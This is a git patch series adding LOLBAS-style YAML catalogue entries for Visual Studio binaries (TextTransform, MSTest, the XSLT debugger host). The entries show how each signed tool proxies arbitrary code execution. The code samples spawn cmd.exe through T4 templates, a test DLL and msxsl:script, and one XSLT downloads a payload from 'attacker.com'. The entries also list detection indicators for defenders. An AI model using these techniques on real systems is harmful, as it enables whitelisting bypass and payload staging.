From 397503513c9efe0333c56661d8400f27092424e4 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 00:50:50 +0300
Subject: [PATCH 01/10] Add TextTransform.exe to OtherMSBinaries

---
 yml/OtherMSBinaries/TextTransform.yml | 33 +++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 yml/OtherMSBinaries/TextTransform.yml

diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
new file mode 100644
index 00000000..5a554318
--- /dev/null
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -0,0 +1,33 @@
+Name: TextTransform.exe
+Description: T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# or VB.NET code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: TextTransform.exe -out {OUTPUT_FILE} {PATH:.tt}
+    Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with full .NET Framework access.
+    Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can spawn processes, download files, access the filesystem, and perform any .NET operation.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransform.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransform.exe
+Code_Sample:
+  - Code: |-
+      <#@ template language="C#" #>
+      <#@ import namespace="System.Diagnostics" #>
+      <#
+          Process.Start("cmd.exe");
+      #>
+Detection:
+  - IOC: TextTransform.exe process execution outside of a typical Visual Studio development context.
+  - IOC: TextTransform.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransform.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'

From 48432a78582e6f53f05ac099de1edb696c0054ea Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 00:57:08 +0300
Subject: [PATCH 02/10] Add metadata for TextTransform.exe

Added metadata for TextTransform.exe including name, description, author, and creation date.
---
 yml/OtherMSBinaries/TextTransform.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
index 5a554318..9d35a5ab 100644
--- a/yml/OtherMSBinaries/TextTransform.yml
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -1,3 +1,4 @@
+---
 Name: TextTransform.exe
 Description: T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# or VB.NET code which executes during template processing.
 Author: Noam Pomerantz

From 12b452f6692d2d0bdd3596d237ea574529c493bb Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 01:01:20 +0300
Subject: [PATCH 03/10] Update TextTransform.yml

---
 yml/OtherMSBinaries/TextTransform.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
index 9d35a5ab..096bd4a1 100644
--- a/yml/OtherMSBinaries/TextTransform.yml
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe

From b40da239592cb3294d396431acad2abe44f65d99 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 01:26:49 +0300
Subject: [PATCH 04/10] Add TextTransformCore.yml

Added configuration for TextTransformCore.exe.
---
 yml/OtherMSBinaries/TextTransformCore.yml | 35 +++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 yml/OtherMSBinaries/TextTransformCore.yml

diff --git a/yml/OtherMSBinaries/TextTransformCore.yml b/yml/OtherMSBinaries/TextTransformCore.yml
new file mode 100644
index 00000000..96345e4c
--- /dev/null
+++ b/yml/OtherMSBinaries/TextTransformCore.yml
@@ -0,0 +1,35 @@
+---
+Name: TextTransformCore.exe
+Description: .NET Core T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: TextTransformCore.exe {PATH:.tt}
+    Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with .NET Core runtime access.
+    Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can write files, access the filesystem, and perform .NET operations. Process.Start requires additional assembly references.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransformCore.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransformCore.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransformCore.exe
+Code_Sample:
+  - Code: |-
+      <#@ template language="C#" #>
+      <#@ assembly name="System.Diagnostics.Process" #>
+      <#@ assembly name="System.ComponentModel.Primitives" #>
+      <#@ import namespace="System.Diagnostics" #>
+      <#
+          Process.Start("cmd.exe");
+      #>
+Detection:
+  - IOC: TextTransformCore.exe process execution outside of a typical Visual Studio development context.
+  - IOC: TextTransformCore.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransformCore.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'

From 9f6feb143fe9f13a7034a625e443158f0614bd33 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:22:48 +0300
Subject: [PATCH 05/10] Create MSTest.yml for MSTest.exe documentation

Added MSTest.yml to document the legacy test execution tool and its usage.
---
 yml/OtherMSBinaries/MSTest.yml | 40 ++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 yml/OtherMSBinaries/MSTest.yml

diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
new file mode 100644
index 00000000..3b6d0d75
--- /dev/null
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -0,0 +1,40 @@
+---
+Name: MSTest.exe
+Description: Legacy Test Execution Command Line Tool included with Visual Studio. Loads and executes .NET test assemblies which can contain arbitrary code.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: MSTest.exe /testcontainer:{PATH:.dll} /resultsfile:{OUTPUT_FILE}
+    Description: Loads a .NET assembly as a test container and executes all methods decorated with [TestMethod]. The test methods run with full .NET Framework access, allowing arbitrary code execution.
+    Usecase: Proxy execution of arbitrary .NET code by packaging it as a unit test DLL. A test runner executing attacker-controlled assemblies is unexpected outside a development context.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
+Code_Sample:
+  - Code: |-
+      // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
+      using Microsoft.VisualStudio.TestTools.UnitTesting;
+      using System.Diagnostics;
+      [TestClass]
+      public class LolbasTest
+      {
+          [TestMethod]
+          public void Execute()
+          {
+              Process.Start("cmd.exe");
+          }
+      }
+Detection:
+  - IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
+  - IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from MSTest.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/test/walkthrough-using-a-configuration-file-to-define-a-data-source
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'

From 7440f2cd411ff38098ba3e21362ae2d4c8c8cad1 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:24:16 +0300
Subject: [PATCH 06/10] Remove code sample from MSTest.yml

Removed code sample for MSTest from configuration.
---
 yml/OtherMSBinaries/MSTest.yml | 14 --------------
 1 file changed, 14 deletions(-)

diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
index 3b6d0d75..adeba364 100644
--- a/yml/OtherMSBinaries/MSTest.yml
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -15,20 +15,6 @@ Full_Path:
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
-Code_Sample:
-  - Code: |-
-      // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
-      using Microsoft.VisualStudio.TestTools.UnitTesting;
-      using System.Diagnostics;
-      [TestClass]
-      public class LolbasTest
-      {
-          [TestMethod]
-          public void Execute()
-          {
-              Process.Start("cmd.exe");
-          }
-      }
 Detection:
   - IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
   - IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.

From f1b65fef3929018eddfd7257628bfedde598548a Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:26:58 +0300
Subject: [PATCH 07/10] Refine description and add code sample for MSTest

Updated the description to use 'TestMethod attribute' instead of '[TestMethod]'. Added a code sample demonstrating malicious test execution.
---
 yml/OtherMSBinaries/MSTest.yml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
index adeba364..0f74902e 100644
--- a/yml/OtherMSBinaries/MSTest.yml
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -5,7 +5,7 @@ Author: Noam Pomerantz
 Created: 2026-04-03
 Commands:
   - Command: MSTest.exe /testcontainer:{PATH:.dll} /resultsfile:{OUTPUT_FILE}
-    Description: Loads a .NET assembly as a test container and executes all methods decorated with [TestMethod]. The test methods run with full .NET Framework access, allowing arbitrary code execution.
+    Description: Loads a .NET assembly as a test container and executes all methods decorated with the TestMethod attribute. The test methods run with full .NET Framework access, allowing arbitrary code execution.
     Usecase: Proxy execution of arbitrary .NET code by packaging it as a unit test DLL. A test runner executing attacker-controlled assemblies is unexpected outside a development context.
     Category: Execute
     Privileges: User
@@ -15,6 +15,20 @@ Full_Path:
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
   - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
+Code_Sample:
+  - Code: |-
+      // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
+      using Microsoft.VisualStudio.TestTools.UnitTesting;
+      using System.Diagnostics;
+      [TestClass]
+      public class LolbasTest
+      {
+          [TestMethod]
+          public void Execute()
+          {
+              Process.Start("cmd.exe");
+          }
+      }
 Detection:
   - IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
   - IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.

From 1980117eccef44f44221cacdf7da7ef561d68c01 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:56:14 +0300
Subject: [PATCH 08/10] Create Microsoft.XslDebugger.Host.yml

---
 .../Microsoft.XslDebugger.Host.yml            | 70 +++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml

diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
new file mode 100644
index 00000000..4d6d875a
--- /dev/null
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -0,0 +1,70 @@
+---
+Name: Microsoft.XslDebugger.Host.exe
+Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
+Author:
+Created: 2026-04-05
+Commands:
+  - Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all
+    Description: Executes arbitrary C# code embedded in msxsl:script blocks within an XSLT stylesheet. The /enable:all flag enables inline script compilation and execution via the .NET XSLT engine. Can call Process.Start, WebClient, and any .NET Framework class.
+    Usecase: Execute arbitrary C# code and spawn processes through a Microsoft-signed XSLT debugger binary.
+    Category: Execute
+    Privileges: User
+    MitreID: T1220
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: XSLT
+  - Command: Microsoft.XslDebugger.Host.exe input.xml download.xsl /enable:all
+    Description: Downloads files from arbitrary URLs using System.Net.WebClient embedded in an XSLT msxsl:script block. The XSLT file contains C# code that calls WebClient.DownloadFile() to save remote content to disk.
+    Usecase: Download files from a remote server using a Microsoft-signed XSLT debugger binary.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Download: HTTP
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+Code_Sample:
+  - Code: |-
+      <!-- input.xml -->
+      <?xml version="1.0"?><data>test</data>
+
+      <!-- payload.xsl (Execute) -->
+      <?xml version="1.0"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+        xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
+        <msxsl:script language="C#" implements-prefix="user"><![CDATA[
+          public string execute() {
+            System.Diagnostics.Process.Start("cmd.exe");
+            return "done";
+          }
+        ]]></msxsl:script>
+        <xsl:template match="/"><xsl:value-of select="user:execute()"/></xsl:template>
+      </xsl:stylesheet>
+
+      <!-- download.xsl (Download) -->
+      <?xml version="1.0"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+        xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
+        <msxsl:script language="C#" implements-prefix="user"><![CDATA[
+          public string download() {
+            new System.Net.WebClient().DownloadFile("http://attacker.com/payload", @"C:\Users\Public\payload.exe");
+            return "done";
+          }
+        ]]></msxsl:script>
+        <xsl:template match="/"><xsl:value-of select="user:download()"/></xsl:template>
+      </xsl:stylesheet>
+Detection:
+  - IOC: Microsoft.XslDebugger.Host.exe execution outside of devenv.exe parent process
+  - IOC: Microsoft.XslDebugger.Host.exe with /enable:all command-line argument
+  - IOC: Microsoft.XslDebugger.Host.exe spawning child processes (cmd.exe, powershell.exe)
+  - IOC: Microsoft.XslDebugger.Host.exe making outbound HTTP/HTTPS connections
+Resources:
+  - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/xslt-transformations
+  - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/script-blocks-using-msxsl-script
+Acknowledgement:
+  - Person: Noam
+    Handle: '@pumi96'

From 68f3ebcbc19e47184e353064fa8d046d741440a8 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:58:18 +0300
Subject: [PATCH 09/10] Add author information to
 Microsoft.XslDebugger.Host.yml

---
 yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
index 4d6d875a..1d83f716 100644
--- a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -1,7 +1,7 @@
 ---
 Name: Microsoft.XslDebugger.Host.exe
 Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
-Author:
+Author: Noam
 Created: 2026-04-05
 Commands:
   - Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all

From 9c735db6bfd317520dc4abf98e0f8d0e083c0931 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:59:28 +0300
Subject: [PATCH 10/10] Update author name in Microsoft.XslDebugger.Host.yml

---
 yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
index 1d83f716..27b80ab3 100644
--- a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -1,7 +1,7 @@
 ---
 Name: Microsoft.XslDebugger.Host.exe
 Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
-Author: Noam
+Author: Noam Pomerantz
 Created: 2026-04-05
 Commands:
   - Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all